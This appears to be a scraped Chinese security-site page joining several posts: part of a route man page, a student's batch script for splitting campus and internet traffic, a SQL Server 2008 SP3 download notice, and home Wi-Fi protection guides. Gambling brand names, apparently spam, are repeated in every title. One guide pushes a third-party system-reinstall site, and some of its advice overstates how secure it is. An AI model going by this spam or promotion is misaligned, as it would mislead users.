[-V] [--version] [-h] [--help]<br /><br />描述 DESCRIPTION<br />route程序对内核的IP选路表进行操作。它主要用于通过已用ifconfig(8)程序配置好的接口来指定的主机或网络设置静态路由。<br /><br />选项 OPTIONS<br />-v <br />选用细节操作模式 <br />-A family <br />用指定的地址族(如`inet',`inet6')。 <br />-n <br />以数字形式代替解释主机名形式来显示地址。此项对试图检测对域名服务器进行路由发生故障的原因非常有用。 <br />-e <br />用netstat(8)的格式来显示选路表。-ee将产生包括选路表所有参数在内的大量信息。 <br />-net <br />路由目标为网络。 <br />-host <br />路由目标为主机。 <br />-F <br />显示内核的FIB选路表。其格式可以用-e 和 -ee选项改变。 <br />-C <br />显示内核的路由缓存。 <br />del <br />删除一条路由。 <br />add <br />添加一条路由。 <br />target <br />指定目标网络或主机。可以用点分十进制形式的IP地址或主机/网络名。 <br />netmask Nm <br />为添加的路由指定网络掩码。 <br />gw Gw <br />为发往目标网络/主机的任何分组指定网关。注意:指定的网关首先必须是可达的。也就是说必须为该网关预先指定一条静态路由。如果你为本地接口之一指定这个网关地址的话,那么此网关地址将用于决定此接口上的分组将如何进行路由。这是BSD风格所兼容的。 <br />metric M <br />把选路表中的路由值字段(由选路进程使用)设为M。 <br />mss M <br />把基于此路由之上的连接的TCP最大报文段长度设为M字节。这通常只用于优化选路设置。默认值为536。 <br />window W <br />把基于此路由之上的连接的TCP窗口长度设为W字节。这通常只用于AX.25网络和不能处理背对背形式的帧的设备。 <br />irtt I <br />把基于此路由之上的TCP连接的初始往返时间设为I毫秒(1-12000)。这通常也只用于AX.25网络。如果省略此选项,则使用RFC1122的缺省值300ms。 <br />reject <br />设置一条阻塞路由以使一条路由查找失败。这用于在使用缺省路由前先屏蔽掉一些网络。但这并不起到防火墙的作用。 <br />mod, dyn, reinstate <br />设置一条动态的或更改过的路由。这些标志通常只由选路进程来设置。这只用于诊断目的, <br />dev If <br />强制使路由与指定的设备关联,因为否则内核会自己来试图检测相应的设备(通常检查已存在的路由和加入路由的设备的规格)。在多数正常的网络上无需使用。 <br />如果dev If是命令行上最后一个指定的选项,那么可以省略关键字dev,因为它是缺省值。否则路由修改对象(metric - netmask- gw - dev)无关紧要。<br /><br />范例 EXAMPLES<br />route add -net 127.0.0.0 <br />加入正常的环回接口项,它使用掩码255.0.0.0(由目标地址决定了它是A类网络)并与设备&quot;lo&quot;相关联(假定该设备先前已由ifconfig(8)正确设置)。 <br />route add -net 192.56.76.0 netmask 255.255.255.0 dev eth0 <br />向&quot;eth0&quot;添加一条指向网络192.56.76.x的路由。其中的C类子网掩码并不必须,因为192.*是个C类的IP地址。在此关键字&quot;dev&quot;可省略。 <br />route add default gw mango-gw <br />加入一条缺省路由(如果无法匹配其它路由则用它)。使用此路由的所有分组将通过网关&quot;mango-gw&quot;进行传输。实际使用此路由的设备取决于如何到达&quot;mango-gw&quot; - 先前必须设好到&quot;mango-gw&quot;的静态路由。 <br />route add ipx4 sl0 <br />向SLIP接口添加一条指向&quot;ipx4&quot;的路由(假定&quot;ipx4&quot;是使用SLIP的主机)。 <br />route add -net 192.57.66.0 netmask 255.255.255.0 gw ipx4 <br />此命令为先前SLIP接口的网关ipx4添加到网络&quot;192.57.66.x&quot;的路由。 <br />route add 224.0.0.0 netmask 240.0.0.0 dev eth0 <br />此命令为&quot;eth0&quot;设定所有D类地址(用于组播)的路由。这是用于组播内核的正确配置行。 <br />route add 10.0.0.0 netmask 255.0.0.0 reject <br />此命令为私有网络&quot;10.x.x.x.&quot;设置一条阻塞路由。 <br />输出信息 OUTPUT<br />内核选路表的输出信息由以下栏目组成:<br /><br />Destination <br />目标网络或目标主机。 <br />Gateway <br />网关地址或'*'(如未设)。 <br />Genmask <br />目标网络的子网掩码;'255.255.255.255'为主机,'0.0.0.0'为缺省路由。 <br />Flags <br />可能出现的标志有: <br />U (route is up) 路由正常 <br />H (target is a host) 主机路由 <br />G (use gateway) 使用网关的间接路由 <br />R (reinstate route for dynamic routing) 为动态选路恢复路由 <br />D (dynamically installed by daemon or redirect) 该路由由选路进程或重定向动态创建 <br />M (modified from routing daemon or rederict) 该路由已由选路进程或重定向修改 <br />! (reject route) 阻塞路由 <br />Metric <br />通向目标的距离(通常以跳来计算)。新内核不使用此概念,而选路进程可能会用。 <br />Ref <br />使用此路由的活动进程个数(Linux内核并不使用)。 <br />Use <br />查找此路由的次数。根据-F 和 -C的使用,此数值是路由缓存的损失数或采样数。 <br />Iface <br />使用此路由发送分组的接口。 <br />MSS <br />基于此路由的TCP连接的缺省最大报文段长度。 <br />Window <br />基于此路由的TCP连接的缺省窗口长度。 <br />irtt <br />初始往返时间。内核用它来猜测最佳TCP协议参数而无须等待(可能很慢的)应答。 <br />HH (cached only) <br />为缓存过的路由而访问硬件报头缓存的ARP记录和缓存路由的数量。如果缓存过路由的接口(如lo)无须硬件地址则值为-1。 <br />Arp (cached only) <br />无论缓存路由所用的硬件地址情况如何都进行更新。 <br />文件 FILES<br />/proc/net/ipv6_route <br />/proc/net/route <br />/proc/net/rt_cache <br /><br /><br /></p><p>&nbsp;两个都能共享了,但是怎么自动选择线路呢?目前有的网吧可以自动选择线路,有的还得手动切换,呵呵,我的目的就是自动选择。我想到了路由表,目标ip是学校的通过有线网卡,除此之外的所有ip都通过无限网卡。对,就是route命令,上网查了查有关route命令.具体设置是这样的:tplink 410静态ip,添加学校分给的ip,克隆mac,打开dhcp,dmz(验证不打开也行。),lan端口设置 ip地址为 192.168.2.1,因为无线网络要用到ip192.168.1.1,所以这个改成2.1当然改成别的也可以。无线路由当然要添加adsl的账号密码,dhcp打开,lan端口设置 ip默认,密匙之类的统统没用,只是限制了mac地址,禁止宿舍几台电脑之外的mac访问路由。<br /><br />设置好了以后就是路由表了,也就是route命令。Route命令在windows下和在linux下适用类似,但是有些细微的差别。下面介绍介绍我自己的route的理解,也是一知半解。高手可以给大家讲详细点儿。先把我的批处理贴出来:<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.186.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.185.0.0 mask 255.255.0.0 192.168.2.1<br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br />参数含义:^destination ^mask ^gateway metric^ ^interface <br /><br />destination【网段地址】 <br />mask【子网掩码】 <br />gateway【网关地址】 <br />metric 【路由跳数】 <br />if【端口号】 <br />其中: <br />可以省略【路由跳数】参数; <br />当通往该网关地址的路径唯一时,【端口号】参数可以省略。(因为在多端口的路由交换设备上,可能存在通往同一个IP地址的多条备份路径。) <br />mask 是关键字,不能省略。<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />意思是:所有发往202.206.0.0地址段的ip数据包,全部由192.168.2.1网关发送。<br />这样大家就能看出来我们学校一些服务器的ip段大概就是202.206.0.0, 10.186.0.0 和10.185.0.0,其实还有其他的,只是我暂时用不到,所以没添加。<br /><br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br />意思是:其他所有的地址段的ip数据包都由192.168.1.1发送。<br /><br />这样每台机子开机运行这个批处理,就能自动选择双线上网了。网吧的我估计也类似,他们完全可以用个双wan路由,在路由器里或者服务器里边添加静态路由表,其他的机子就不用添加路由表了,就可以自动双线上网了,不过电信网通的路由表貌似还很大,不知道谁能共享一下哦。呵呵<br /><br />还有route change 命令,就是把add改为change,就是更改静态路由表。<br /><br />这样,我们的目的就实现了,校内校外都能访问,其中一台电脑还可以通过学校的拨号程序访问校外的资源,如果他已经运行了批处理,已经添加了静态路由表,还可以通过route change命令更改。下面是我写的一个批处理贴出:<br />@ECHO OFF<br />CLS<br />color 0a<br />ECHO =-=-=-=-=请选择要启动的服务项目=-=-=-=-=<br />ECHO. <br />ECHO 1 双网双线,如果不使用elink,开机选择!<br />ECHO.<br />ECHO 2 恢复elink拨号(之前选择了1,现在重新选择2,如果之前没有选择线路,此时不需<br />ECHO 选择,直接拨号即可)<br />ECHO. <br />ECHO 3 恢复双网双线(之前选择了2现在重新选回双网双线)<br />ECHO. <br />ECHO.<br />SET /P ST= 请输入 1 2 3 或 其他任意键取消:<br />if /I \&quot;%ST%\&quot;==\&quot;1\&quot; goto SERVICE1<br />if /I \&quot;%ST%\&quot;==\&quot;2\&quot; goto SERVICE2<br />if /I \&quot;%ST%\&quot;==\&quot;3\&quot; goto SERVICE3<br /><br />goto END<br /><br />:SERVICE1<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.186.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.185.0.0 mask 255.255.0.0 192.168.2.1<br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br /><br />:SERVICE2<br />route change 0.0.0.0 mask 0.0.0.0 192.168.2.1<br /><br /><br />:SERVICE3<br />route change 0.0.0.0 mask 0.0.0.0 192.168.1.1<br /><br /><br />:END<br /><br />这样就可以自由选择怎么上网了,其实我感觉用vb写个小程序更好一些呵呵。<br /><br />先告一段落吧,还有一点就是linux下的route add命令。<br />Route 202.206.0.0 netmask 255.255.0.0 gw 192.168.2.1<br /><br />好了,写到这里了,思路很乱不知道改怎么整理,这是我第一次写类似这样的文章。大家别取笑了。希望对宿舍内共享上网的人能有帮助。</p> [数据库安全]SQL Server 2008 SP3简体中文版下载-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13319_1.html 佚名 数据库安全 2011/10/17 22:11:08 Microsoft SQL Server 2008 Service Pack 3 (SP3) 现在可供下载。我们不仅控制着产品更改,而且还投入了很大的力量来简化 Service Pack 的部署和管理。对于客户来说,Microsoft SQL Server 2008 Service Pack 3 中有这样几项重要改进:<br /><br /> 从 SQL Server 的旧版本升级到 SQL Server 2008 SP3 的过程体验得到了改进。另外,我们增强了安装体验的性能和可靠性。<br /> 在 SQL Server Integration Services 日志中,现在能看到在数据流中发送的总行数。<br /> 在启用了“缩减数据库”选项的情况下创建维护计划时的警告信息得到了改进。<br /> 在启用了透明数据加密的情况下解决数据库问题,而且即使删除了证书也能使用数据库。<br /> 在 DTA(数据库调节顾问)引用经过索引的“空间数据类型”列时,查询结果经过了优化。<br /> 用户在并行执行计划中使用“序列函数”(如 Row_Numbers())可获得优异的体验。<br /><br /><br />Microsoft SQL Server 2008 Service Pack 2 不是安装 SQL Server 2008 Service Pack 3 的先决条件。可以使用这些包升级以下 SQL Server 2008 版本:<br /><br /> Enterprise<br /> Standard<br /> Evaluation<br /> 开发人员<br /> Workgroup<br /><br /><br />SQL Server 2008 SP3 包含 SQL Server 2008 SP2 累积更新包 1 至 4 的累积更新,以及对通过客户反馈平台所收集问题的修复。它包括可支持性增强以及通过 Windows 错误报告收集的问题。<br /><br /><br />注意:要获取用于 Express Edition 或具有高级服务的 Express Edition 的 SQL Server 2008 SP3,请转到此处。<br />有关 SQL Server 2008 SP3 中包括的新功能和改进的详细列表,请参阅发行说明。<br /><br /><h2 class="title"><strong>微软日前公开发布了SQL Server 2008 SP3,用户可以从微软下载中心获取SP服务包和功能包升级。SP3主要包括自SQL Server 2008 SP2以来的累积更新,修复了用户反馈的一些问题。SQL Server 2008 SP3主要更新如下:</strong></h2><p><strong>  — 完善了从之前版本升级至SQL Server 2008 SP3的用户体验,对产品启动进行了性能和稳定性的增强;</strong></p><p><strong>  — 在SQL Server Integration服务日志中将显示所有Data Flows中发送的总行数;</strong></p><p><strong>  — 当Shrink Database选项开启时,增强了创建维护计划的警告信息;</strong></p><p><strong>  — 解决了透明数据加密启用时的数据库问题;</strong></p><p><strong>  — 优化了索引关于DAT(数据库调节向导)的Spatial Data Type列的查询结果;</strong></p><p><strong>  — Sequence Functions(例如Row_Numbers())用户体验优化。</strong></p><p><strong>  下面列出了SQL Server SP3包的大小:</strong></p><p><strong>  SQL Server Express包:</strong></p><p><strong>  SQLEXPR32_x86(在32位和64位操作系统中均可安装):95MB</strong></p><p><strong>  SQLEXPR_x86(可在 32 位操作系统中安装):108MB</strong></p><p><strong>  SQLEXPR_x64:121MB</strong></p><p><strong>  SQL Server的所有其他版本:</strong></p><p><strong>  X86:312MB</strong></p><p><strong>  X64:379MB</strong></p><p><strong>  IA64:370MB</strong></p><p><strong>  简体中文版官方下载:</strong></p><p><strong>&nbsp;<br />下载大小:<br />下载下列文件<br />MicrosoftSQLServer2008SP3Readme.htm 15KB<br />SQLServer2008SP3-KB2546951-IA64-CHS.exe 370.8MB<br />SQLServer2008SP3-KB2546951-x64-CHS.exe 379.7MB<br />SQLServer2008SP3-KB2546951-x86-CHS.exe 312.3MB<br /><br /><br /></strong></p><p><strong>  SQL Server 2008 SP3:</strong></p><p><strong>  <a title="烈火提示:点击查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?familyid=757bca07-7b52-46fb-ab92-476be9339442&amp;displaylang=zh-cn" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?familyid=757bca07-7b52-46fb-ab92-476be9339442&amp;displaylang=zh-cn</a></strong> </p><p><strong>  SQL Server 2008 SP3 Express免费精简版:</strong></p><p><strong>  <a title="烈火提示:点击查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=15279834-6f7e-4c95-a772-921f771a9549" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=15279834-6f7e-4c95-a772-921f771a9549</a></strong> </p><p><strong>  SQL Server 2008 SP3功能包:</strong></p><p><strong>  <a title="烈火提示:点击查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27</a></strong></p><p><strong><a title="烈火提示:点击查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27" target="_blank">&nbsp;<br /></a></strong> </p><strong><br /></strong><br /> [防护教程]如何防止蹭网蹭宽带! 怎样发现与防蹭网?-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13174_1.html 佚名 防护教程 2011/9/27 11:58:49 <p>高科技年代使用笔记本电脑、手机无线上网对无数人来说已是家常便饭,无线宽带也已成为家庭上网的首选方式。据爱立信统计,全球使用无线服务用户数已突破50亿。然而,前不久各大媒体集中报道的“蹭网卡”,却让不少人对无线上网的安全性倍感忧虑。你家的无线宽带是否被人“蹭”过?如何赶跑恶意的“蹭网小偷”很多人可能会认为,蹭网,不就是自己家的无线网络被别人用一下么?千万不要轻视“被蹭网”的危害。一旦你的私人网络被不怀好意的人盯上,你就要想清楚是否能承受以下两大风险: <br />1.网速被拖慢 <br /><br />由于上网带宽是固定的(例如2M带宽),被蹭网后必然会分流一部分带宽,如果蹭网的设备进行文件下载、观看在线视频等操作,自己的网速可能会变得很慢。<br /><br />2.面临安全隐私危机 <br /><br />蹭网成功后,蹭网的电脑就成为局域网中的网上邻居,若他们再使用一些黑客工具,就很容易直接入侵到本机,从而可轻松盗取你上网中的所有私人信息和数据,恶劣后果可想而知。<br /><br />然而不必担心 本人总结出了 一套安全设置的办法 保证安全 对付一般类型的蹭网卡、和菜鸟黑客 搓搓有余!<br /><br />以下本人将按照安全级别和安全指数对比 为您介绍无线路由的设置 您可以根据情况设置!<br /><br />  1.不让小偷盯上你<br /><br />  安全策略:隐藏你的无线网络ID<br /><br />  安全指数:★★ <br /><br />  当你买了无线路由器在家布置了无线网络后,你家里就有了一个Wi-Fi无线网络环境了。打开你的笔记本或其他移动设备,寻找无线网络时,就可以看到有很多网络名字,这些名字就是服务设定标识(SSID)。<br /><br />  当你购买一个无线路由器后,默认的SSID一般都和该路由器的品牌相关联。比如你买的是TP-Link,你的SSID号开始肯定以TP-Link开头。一个黑客可以轻松通过你的SSID知道你的路由器品牌。你可以在无线路由的管理界面上,修改这个SSID,改成你喜欢的名字,这样起码可以在一定程度上隐蔽你的无线路由。<br /><br />  修改SSID只是最简单的方式,我们还可以通过关闭SSID广播来起到更好的效果。以Linksys管理界面为例,SETUP选项中,SSID Broadcast就可以选择Disable,这样就关闭了SSID。这样你的无线网络,对于一般人来说,就是隐蔽了。<br /><br />这时,在你自己的笔记本上,点击“查看无线网络”按钮。以Windows XP为例,在修改高级设置链接中,然后点击无线网络配置标签。在首选网络部分点击增加按钮,然后输入你修改后的SSID,点击确认,你就可以连接到你的无线网络中了。一般人不知道你的无线网络SSID,所以安全性得到了一定提高。<br /><br /><br />  2.门前上个锁<br /><br />  安全策略:加密你的无线网络<br /><br />  安全指数:★★★<br /><br />  时下,一般无线路由都提供两种加密标准:无线对等协议(WEP)和Wi-Fi保护接入(WPA)。WEP要比WPA老,但是不如WPA安全。目前网上流行的,“10分钟可破解无线路由器密码”,指的就是破解WEP密码。所以,采用WPA会更安全些,起码给黑客制造更多的麻烦。<br /><br />  设置加密后,需要无线上网的电脑上查看无线网络属性,在网络密钥对话框中输入密码,你的PC就可以连接到你的使用WPA加密的无线网络了。<br /><br />  <br /><br />  3.筛选你的访客<br /><br />  安全策略:使用MAC地址过滤<br /><br />  安全指数:★★★★<br /><br />  每一个网络设备都有唯一的被称作MAC地址的ID,一般是这种格式:00-D8-A1-40-9F-62。你可以利用他来据入侵者于门外。许多路由器允许你设定一个范围的MAC地址可以接入到互联网。这样你可以告诉无线路由器哪些是你自己的PC的MAC地址,不属于这个范围的一律拒之门外。<br /><br />  如何查看自己电脑网卡的MAC地址的ID呢?在Windows系统中点选“开始菜单”,然后选“运行”,弹出的对话框中输入“cmd ”,回车后会出现命令行窗口。在命令行窗口中输入 ipconfig /all。寻找名为“Physical Address”的这一行,其后所显示的地址即为该设备的MAC地址。<br /><br /><br />  <br /><br />  4.雇多个保安<br /><br />  安全策略:限定IP地址<br /><br />  安全指数:★★★★<br /><br />  当你的计算机连接到你的网络中的时候,你的无线路由器通常会分给他一个IP地址,用他来浏览网页或连接外部互联网。通常情况下,无线路由器会给每一个连接到无线网络中来的每一台机器分配一个IP。<br /><br />  但是你可以告诉你的无线路由器只分配一定范围的IP地址,假如你的网络中的计算机使用了所有的IP地址的话,你的无线路由器就不会为入侵者再分配IP地址。<br /><br />  比如你家有两台无线上网电脑,你指定你的无线路由,只分配192.168.1.1至192.168.1.2,这样当你的两台电脑都上网时,别人就无法再分配IP了,而如果你哪天发现自己的电脑分配不到IP,就知道你楼下的保安给小偷干掉了。 <br /><br />如果到这里问题还是没有解决 那么强烈建议您到系统基地 www.7u5u.com 重新安装系统 很可能是在你的系统里原生的植入了木马或病毒<br /><br />按照上述设置后 基本已经非常安全了 还是不放心的话 可选择 防蹭网的检测小软件如 360防蹭网 功能<br /><br />另外如果大家实在是 不懂无线路由的设置 或者其他原因没办法自己设置也可以选择360安全卫士 在8.3新版推出的防蹭网的小软件 笔者试过 对于新手朋友来讲 很实用!<br /><br />下载安装360安全卫士最新的8.3版 在主窗口右侧找到并打开“流量防火墙”,选择“防蹭网”选项卡,直接单击“立即启用”按钮,它会自动检测所有无线连接到路由器或是无线宽带猫中的设备。如果列表中出现了“未知设备”,就需要提防了,如果该设备不是自己的电脑、手机,那极有可能就是蹭网的“小偷”(见图2)。 <br /><br />360安全卫士下载</p><p>{insd m=&quot;2&quot; i=&quot;2855&quot;}<br /><br />图2: “防蹭网”监测到疑似蹭网设备<br /><br />如果确定被蹭网,也不用过度担心,只要单击“修改密码”按钮,360流量防火墙会给出详细的修改密码方法(见图3)。<br /><br /><br /><br />图3:发现“被蹭网”后,360会指导用户修改密码<br /><br />据了解,大部分无线设备的设置页面默认密码都是“admin”,但也有部分品牌产品的账号及密码是其他字符,可以参考设备说明书或是直接以设备品牌及型号进行搜索。<br /><br />360安全专家提醒广大用户,使用无线路由器或是无线宽带猫上网的情况下,一定要为无线信号加密,而且尽量设置复杂的密码,防止别人破解。此外,配合360流量防火墙的防蹭网功能,实时监控蹭网行为,不仅可以保护自己的网速,还可以避免黑客攻击等问题。<br /><br />新闻背景:何为“蹭网”?<br /><br />“蹭网”,主要是指在私人家庭无线网络未加密的情况下,未经主人同意,主动盗用他人无线带宽的一种行为。通过网上热销的无线“蹭网卡”设备,甚至可以**破解私人无线路由器密码,强行使用他人无线网络。系统城市整理.<br /><br /><br /></p> [安全产品]360安全卫士8.3最新版完整功能体验-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13173_1.html 西西 安全产品 2011/9/27 11:41:16 <p>&nbsp;<strong>【功能大全——360性能体检】</strong><br /><br />  凌晨两点,端坐在电脑前看欧冠,梅西带球突入禁区,晃过最后一个后卫,起脚打门,咣,电脑卡死了!进了吗?!不知道!坑爹啊有木有!摔电脑的心都有了有木有!电脑又卡又慢的人你伤不起啊!<br /><br />  ——相信很多人都有以上“电脑卡、慢得想摔”的经验,但绝大多数人对此束手无策。电脑究竟为什么会越变越慢呢?想知道原因?<br /><br />  现在,360安全卫士全新推出“360性能体检”,可以一键帮您检测电脑开机的时间,并对你的硬件进行评分,检测当前网络的性能,替你揪出让电脑变慢的真凶!<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271129526762.jpg" alt="" /><br /><br />  <strong>【云查杀】</strong><br /><br />  1、更新启发式引擎病毒库,提升查杀效率;<br /><br />  2、优化信任区的使用效率。<br /><br />  <strong>【软件管家】</strong><br /><br />  增加对手机助手Android、iPhone版支持,应用轻松下<br /><br />  <strong>【网盾】</strong><br /><br />  主页锁定提示进一步优化,更直观方便的修改已锁定的主页<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711285863181.jpg" alt="" /><br /><br />  <strong>【系统修复】</strong><br /><br />  1、插件清理扫描速度优化;<br /><br />  2、增加浏览器二级页面打不开的修复;<br /><br />  3、增加桌面图标大小、图标间距异常的修复。<br /><br />  <strong>【云查杀】</strong><br /><br />  深度扫描电脑上已安装的软件,及时发现被感染、篡改的软件文件及其他潜在风险,保证常用软件安全。<br /><br />  <strong>【网购保镖】</strong><br /><br />  1、网购保镖界面优化关闭按钮;<br /><br />  2、修正主程序界面网购保镖点击一键开启后,防护未完全开启的问题。<br /><br />  <strong>【360云恢复】</strong><br /><br />  在使用电脑的过程中,随时可能出现死机、硬件损坏、系统崩溃需要重装等意外故障。<br /><br />  这些意外会导致上网账号,系统设置,常用软件等重要资料丢失。轻则耽误时间重新设置,重新安装软件,重则丢失上网账号无法上网,丢失收藏的网站等等。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271130146779.png" alt="" /><br /><br />  360云恢复提供无限免费空间,为您可靠保存支持一键备份和恢复系统核心文件、IE首页、IE收藏夹、桌面壁纸、ADSL账号、Host设置、应用软件等重要数据。即便电脑遇到意外或者重装系统,也能快速将资料恢复,避免损失。<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/832_614/25/01/b3/2501b3bq1084.1d539c.png" alt="" /><br /><br />  <strong>【360(91)手机助手安卓版】</strong><br /><br />  1、全新设计的logo和界面,清新自然,富有科技感;<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/990_710/27/01/c3/2701c3dq10e6.00e86d.png" alt="" /><br /><br />  2、支持更多的机型,能识别出更多android机型,增加大量手机驱动,插上电脑即可自动完成驱动安装和连接的过程;<br /><br />  3、新增视频、图片管理功能,让您方便的查看、导入、导出手机中的照片、电影等资料;电影下载站、壁纸大全即将上线;<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132219577.png" alt="" /><br /><br />  4、优化任务管理功能,增加状态栏任务进度条显示;<br /><br />  5、增加apk文件关联设置,在电脑中双击手机应用安装包文件即可一键安装到手机;<br /><br />  6、用户可自由选择安装应用到手机中或SD卡里(仅支持Android2.2以上固件);<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132304935.png" alt="" /><br /><br />  7、新增手机系统应用管理功能,可查看手机自带的系统应用,并支持系统应用的升级和还原;<br /><br />  8、超大超全的资源库,提供更加海量的应用、软件、音乐等资源;<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/990_710/26/02/39/260239q1081.ec5472.png" alt="" /><br /><br />  9、增加话费充值功能,可随时给手机充值,还能打折哦;<br /><br />  10、新增用户反馈入口,方便您及时与我们进行沟通,快速解决您使用中的问题。<br /><br />  <strong>【网盾】</strong><br /><br />  1、网购保镖界面、下载保护界面重构<br /><br />  2、网购模式调整:淘宝等常用购物网站进入保护但不扫描<br /><br />  <strong>【开机加速】</strong><br /><br />  1、开机小助手使用新皮肤;<br /><br />  2、优化我的开机时间的显示和提示信息,更全面。<br /><br />  <strong>【云查杀】</strong><br /><br />  1、完善对云查询缓存的处理,提升查询速度;<br /><br />  2、提升清除黑DNS的性能;<br /><br />  3、增加威金病毒新变种的专杀。<br /><br />  <strong>【系统修复】</strong><br /><br />  1、增强32/64位系统的修复能力,修复更全面<br /><br />  2、新增系统桌面被禁用的修复<br /><br />  3、新增系统右键无法新建“文本文档”的修复<br /><br />  4、新增IE脚本支持组件被劫持的修复<br /><br />  5、增强Internet选项的修复<br /><br />  6、增强系统无法关闭的修复<br /><br />  7、增强可执行文件无法打开的修复<br /><br />  <strong>【木马防火墙】</strong><br /><br />  强化黑客入侵防护,增加拦截规则,阻止黑客创建用户账户,利用微软SQLServer和MySQL漏洞入侵等行为。<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/20/01/a1/2001a14qeb0.09e6ad.png" alt="" /><br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/2a/01/92/2a01924qed4.796a17.png" alt="" /><br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/25/02/14/2502142qf3a.527729.png" alt="" /><br /><br />  <strong>【优化加速】</strong><br /><br />  增加“我的开机时间”Tab页面<br /><br />  1、增加图形化效果展示每个启动项目的开机时间占用;<br /><br />  2、增加“晒开机时间到微博”功能;<br /><br />  3、增加“一键优化”结果页面,百分比直观显示本次优化后的效果。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711290677573.jpg" alt="" /><br /><br />  <strong>【系统修复】</strong><br /><br />  1、解决桌面图标被放大或缩小的问题;<br /><br />  2、增强浏览器二级页面打不开的修复;<br /><br />  3、增强快捷方式无法打开的修复;<br /><br />  4、全面支持Win764位。<br /><br />  5、增加快捷方式属性无法查找目标的修复,更完善。<br /><br />  6、优化修复逻辑,解决了两处可能引起程序崩溃的隐患<br /><br />  7、360电脑门诊增加系统字体,浏览器无法输入文字等问题的修复;<br /><br />  8、增强对64位系统的支持,修复更全面。<br /><br />  9、主界面增加“主页锁定”功能,帮助您快速锁定主页,防止被恶意程序篡改<br /><br />  <strong>【功能大全——360闪电云鉴定器】</strong>(点击查看360闪电云鉴定器详细介绍 )<br /><br />  360闪电云鉴定器基于360安全中心独创的“云QVM”技术,能在极短时间内鉴定最新病毒,绝大部分文件甚至都不需要上传。运用领先的“云QVM”鉴定技术,仅需获取文件的微小信息点,就可鉴定最新病毒文件。无论病毒采用何种加壳、变形技术,都难逃云鉴定器的“闪电慧眼”。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711290727624.jpg" alt="" /><br /><br />  <strong>【360手机助手】</strong><br /><br />  1、修复了部分用户安装驱动失败的问题<br /><br />  2、优化了设备的连接识别过程,增加电池充满提醒,体验更加友好<br /><br />  3、支持更多手机型号,增加了大量手机型号图片,手机型号识别更准确<br /><br />  4、开放平台增加应用汇、多米音乐、91文学站等第三方资源,提供更丰富的资源下载<br /><br />  5、增加手机联系人、短信备份/恢复功能<br /><br />  6、增加应用升级功能<br /><br />  7、新功能需安装360手机卫士,手机安全更有保障<br /><br />  8、优化了驱动安装方式,修复了部分用户安装驱动失败的问题;<br /><br />  9、增加了安装本地应用的功能,方便用户安装电脑中的应用安装包到手机中;<br /><br />  10、增加了手机音乐和电子书管理功能;<br /><br />  11、优化了手机联系人、短信备份/恢复功能;<br /><br />  12、开放平台增加机锋市场,提供更丰富的软件、游戏的下载。<br /><br />  <strong>【功能大全——360任务管理器】</strong><br /><br />  1、帮助您详细了解和查看各系统进程、系统服务,让任务管理器更简单易懂;<br /><br />  2、帮助您便捷关闭各系统进程、系统服务,同时优化内存,加快电脑运行速度;<br /><br />  3、方便您实时掌握电脑资源利用状况,系统性能一目了然。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271133084483.png" alt="" /><br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132584408.png" alt="" /></p> [网络安全]如何保证您的无线网络不被入侵-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13122_1.html 佚名 网络安全 2011/9/21 9:30:35 &nbsp;越来越多的无线产品正在投入使用,无线安全的概念也不是风声大雨点小,不论是咖啡店、机场的无线网络,还是自家用的无线路由都已经成为了黑客进攻的目标。那么如何才能保证自己的无线安全呢?首先,必须控制进入网络的资格,即认证;其次,保护以无线方式发送的信息,即数据加密。 <br /><br />  那么我们通过Com公司提供的防止黑客攻击的十条对策,谈论如何保证无线安全。 <br /><br />  1.正确放置网络的接入点设备 <br /><br />  从基础做起:在网络配置中,要确保无线接入点放置在防火墙范围之外。 <br /><br />  2.利用MAC阻止黑客攻击 <br /><br />  利用基于MAC地址的ACLs(访问控制表)确保只有经过注册的设备才能进入网络。MAC过滤技术就如同给系统的前门再加一把锁,设置的障碍越多,越会使黑客知难而退,不得不转而寻求其他低安全性的网络。 <br /><br />  3.有效管理无线网络的ID <br /><br />  所有无线局域网都有一个缺省的SSID(服务标识符)或网络名。立即更改这个名字,用文字和数字符号来表示。如果企业具有网络管理能力,应该定期更改SSID。不要到处使用这个名字:即取消SSID自动播放功能。 <br /><br />  4.WEP协议的重要性 <br /><br />  